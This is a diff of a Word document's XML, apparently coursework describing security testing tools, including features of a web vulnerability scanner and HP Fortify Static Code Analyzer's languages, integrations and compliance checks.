+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>You can customize the policies to suit your needs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Tools support: It has tools like Authentication Tester, Token Analyzer, and HTTP Request Editor which comes in handy when testing for vulnerabilities manually.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Support for Ajax and dojo frameworks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HP Fortify Static Code Analyzer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HP Fortify Static Code Analyzer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>поддерживает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>большое</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>число</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>языков</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>программирования</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>платформ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>включая</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>веб</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>приложения</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>написанные</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHP, Python, Java/JSP, ASP.Net </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> JavaScript, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>встраиваемый</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>языках</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ABAP (SAP), Action Script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> VBScript.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>руктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26927,19 +27808,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -27069,6 +27937,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="162246DF"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="21181962"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4320"/>
+        </w:tabs>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5040"/>
+        </w:tabs>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5760"/>
+        </w:tabs>
